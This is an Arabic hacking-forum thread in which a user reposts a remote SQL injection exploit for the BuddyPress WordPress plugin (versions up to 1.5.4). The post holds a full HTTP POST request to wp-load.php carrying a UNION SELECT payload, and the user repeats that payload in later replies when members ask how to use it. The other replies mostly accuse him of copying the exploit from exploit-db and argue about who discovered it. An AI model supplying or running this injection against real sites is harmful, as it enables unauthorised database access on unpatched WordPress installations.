تغره برفيت في سكريب WordPress

[محمد50]

:icon31::icon31::icon31::icon31::icon31::icon31::icon31::icon31:
السلام عليكم
كيف الحال ان شاء الله انتم بخير
هاذي تغره في سكريب
WordPress
.
.
.
كود التغره هاذه هوا
[PHP]# Exploit Title: Buddypress plugin of Wordpress remote SQL Injection
# Date: March 31, 2012
# Author: Ivan Terkin
# Exploitation: Remote Exploit
# Bug: Remote SQL Injection
# Software Link: buddypress.org
# Version: till 1.5.5
# Tested on: Buddypress 1.5.4


POST /wp-load.php HTTP/1.1
User-محمد50
Host: vbspiders.com
Accept: */*
Referer: http://vbspiders.com/activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded

action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+

Reported to developers and fixed in version 1.5.5[/PHP]

وبعدين لعيكم
ان هاذي التغره بي اصلهاء من تغرات sql
بس قمت انا بي اكتشف بي سكريب WordPress ووجت تغره اس كيو ال
وقدمت هاء لكم
بااااااااااااااااااااااي
كان معكم (((محمد50)))
وايضأً لي التحميل من المرفقات
:msn-wink::msn-wink::msn-wink::msn-wink:
:6::6::6::6::6::6::6::6::6::6::6::6::6::6::6::6::6::6::6::6::6::6::6::6:
​

​

 

[محمد50]

رد: تغره برفيت في سكريب WordPress

؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟ فين الردود انا تعبت ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

 

[mohamedreyad]

رد: تغره برفيت في سكريب WordPress

بسم الله ما شاء الله
واصل ابداعك
ولكن لو سمحت كيف الاستغلال لها ؟؟

 

[abdellatef]

رد: تغره برفيت في سكريب WordPress

يا غالي هدا بلوغين فقط
وبحت عنه قليل من نصبه

 

[netgoogle]

رد: تغره برفيت في سكريب WordPress

اللاسم عليكمم
المهم طريقة الإستغلال

 

[محمد50]

رد: تغره برفيت في سكريب WordPress

اللاسم عليكمم
المهم طريقة الإستغلال

يا الغالي هاذ الستغلالا جهاز لي تغره اس كيو ال
action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+

ومن نحيه لي الستغلالا الكود فهوا من السكريب بي الملف هاذ

Buddypress plugin of Wordpress remote SQL Injection
وباااااااااااي

 

[محمد50]

رد: تغره برفيت في سكريب WordPress

يا غالي هدا بلوغين فقط
وبحت عنه قليل من نصبه

:exclamationpoint:
:exclamationpoint:
؟
؟
؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
؟؟؟؟؟ ايش تقول يا الغالي والله مش فهمك يا الغالي ؟؟؟؟؟؟؟؟؟؟؟؟؟
؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

لو تبغاء شي ارسل لي عبر الخص اوكيه
بااااااااااااااااااااااااااااااااااااااااااااااااااااي

 

[محمد50]

رد: تغره برفيت في سكريب WordPress

بسم الله ما شاء الله
واصل ابداعك
ولكن لو سمحت كيف الاستغلال لها ؟؟

يا الغالي من استغلالا هاذ جهاز

من نو ع الملافات هاذ
Buddypress plugin of Wordpress remote SQL Injection

او
تبغاء جهاز من هناء
action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+

 

[تاجر مخدرات]

رد: تغره برفيت في سكريب WordPress

تسلم ع النقل يا غالي


الثغره الاصله

http://www.exploit-db.com/exploits/18690/

الثغره مو برايفت ولا حاجه

والمكتشف الاصلي

MEHYARK

يا ريت تزود كلمه منقول تحت

 

[محمد50]

رد: تغره برفيت في سكريب WordPress

تسلم ع النقل يا غالي


الثغره الاصله

http://www.exploit-db.com/exploits/18690/

الثغره مو برايفت ولا حاجه

والمكتشف الاصلي

MEHYARK

يا ريت تزود كلمه منقول تحت

يا الغالي
والله انا الدي قدمتهاء لي موقع سكرواتي وموقع
1337day
انا الدي قدمتهاء يا الغالي
يعني انا من صنعهاء
اذا انت تقول ان انا انقل وبس طيب هههههههههههه
ايش ريك ان من اليوم ما اقدم تغره لي المواقع حقكوم والله ما اقدم مره اخر لا لي 1337day ولا موقع سوكرتي ولا اي لي واحد
وشكرن على الناس الدي ردت على الموضوع بي كلام حلو
"
"
وبعدين ههههه لي علمك ان الموقع اسكررتي هم الدين ترجوانا ان اضم معهم بي كشف التغرات
لكن هههههههههههههههههههههههههه
خلا ص
"""واقول لك خبر""" ان هاذي التغره عمرهاء من عام 20004 ............................
يعني قديمه من التغرت الجديده
هههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههه
باااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااي
:icon28::icon28::icon28::icon28::icon28::icon28::icon28::icon28:

 

[aircrack -ng]

رد: تغره برفيت في سكريب WordPress

يا الغالي
والله انا الدي قدمتهاء لي موقع سكرواتي وموقع
1337day
انا الدي قدمتهاء يا الغالي
يعني انا من صنعهاء
اذا انت تقول ان انا انقل وبس طيب هههههههههههه
ايش ريك ان من اليوم ما اقدم تغره لي المواقع حقكوم والله ما اقدم مره اخر لا لي 1337day ولا موقع سوكرتي ولا اي لي واحد
وشكرن على الناس الدي ردت على الموضوع بي كلام حلو
"
"
وبعدين ههههه لي علمك ان الموقع اسكررتي هم الدين ترجوانا ان اضم معهم بي كشف التغرات
لكن هههههههههههههههههههههههههه
خلا ص
"""واقول لك خبر""" ان هاذي التغره عمرهاء من عام 20004 ............................
يعني قديمه من التغرت الجديده
هههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههه
باااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااي
:icon28::icon28::icon28::icon28::icon28::icon28::icon28::icon28:

شوف تاريخ الثغره وشوف تاريخ موضوعك
وزيدلك شيء مكتشف الثغره تركي
عادي جدا لما تذكر منقول

 

[تاجر مخدرات]

رد: تغره برفيت في سكريب WordPress

يا الغالي
والله انا الدي قدمتهاء لي موقع سكرواتي وموقع
1337day
انا الدي قدمتهاء يا الغالي
يعني انا من صنعهاء
اذا انت تقول ان انا انقل وبس طيب هههههههههههه
ايش ريك ان من اليوم ما اقدم تغره لي المواقع حقكوم والله ما اقدم مره اخر لا لي 1337day ولا موقع سوكرتي ولا اي لي واحد
وشكرن على الناس الدي ردت على الموضوع بي كلام حلو
"
"
وبعدين ههههه لي علمك ان الموقع اسكررتي هم الدين ترجوانا ان اضم معهم بي كشف التغرات
لكن هههههههههههههههههههههههههه
خلا ص
"""واقول لك خبر""" ان هاذي التغره عمرهاء من عام 20004 ............................
يعني قديمه من التغرت الجديده
هههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههه
باااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااي
:icon28::icon28::icon28::icon28::icon28::icon28::icon28::icon28:

انا مش عارف من وين أبدأ كلامك رفع ضغطي
المهم احنا ف منتدى يعني خد الانتقاد بروح رياضه
نبدأ مع مكتشف الثغره

# Exploit Title: Buddypress plugin of Wordpress remote SQL Injection# Date: March 31, 2012# Author: Ivan Terkin# Exploitation: Remote Exploit# Bug: Remote SQL Injection# Software Link: buddypress.org# Version: till 1.5.5# Tested on: Buddypress 1.5.4

أكيد بتعرف تقرا انقلش وعرفت الاسم
زي ما قال عبد الصمد هادا موقع الاسبلويت

ولو بدك المكتشف الاصلي وفي الفيرجن 1.5.5

فوت هون

http://silverspam.net/showthread.php?t=8068


الحاجه التانيه

 وبعدين ههههه لي علمك ان الموقع اسكررتي هم الدين ترجوانا ان اضم معهم بي كشف التغرات 
لكن هههههههههههههههههههههههههه

يا حظ مواقع السكيورتي فيك

وبعدين

"""واقول لك خبر""" ان هاذي التغره عمرهاء من عام 20004  ............................
يعني قديمه من التغرت الجديده

مش عارف كيف ارد انتا بترد ع حالك وانتا بتقول برايفت والحين بتقول من 2004

وبعدين فوت ع الموقع تبع السكربت

http://buddypress.org/2012/02/buddypress-1-5-4/

وشوف اصلا الفيرجن هاي إمتى نزلت

يش ريك ان من اليوم ما اقدم تغره لي المواقع حقكوم والله ما اقدم مره اخر لا لي 1337day ولا موقع سوكرتي ولا اي لي واحد

لا يا استاز ما بدنا نخسر حدا يعني احنا بنتناقش المنتدى منتداك

هههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههه
باااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااي

غرور زياده




ع اعتبار انتا مكتشف الثغره ممكن استفسر عن شغله ورد عيا

الحين
and(1=0) ايش معناها برمجياُ

يعني ايش القصد منها ليش

يعني لو حطينا

'or''='

ممكن تشتغل الثغره



نصيحه
حاول تتواضع ومن تواضع لله رفعه


حاول تاخد كلامي ع انه انتقاد بناء

انا ما في بيني وبينك حاجه

وأخر حاجه عمرك ما تراسلني ع الخاص

ف أمان الله

*ملاحظه

ما تستنى مني رد انا ما بفوت كتير سلام

 

[OuT-L4W]

رد: تغره برفيت في سكريب WordPress

قبل انزل تحت واشوف توضيحات الشباب
عرفت انك لاطش الثغرة والدليل لمن سالك الاستغلال ^^
مشكور ع النقل

 

[محمد50]

رد: تغره برفيت في سكريب WordPress

هههههه والله خفت منكم
لكن على ما قال اعمل عمل خير تلقي شر
لكن طيب اقسم انا ان ما اقدم اي شي
بااااااااااااااااااااااااااااااااااااااااااااااااااااااااي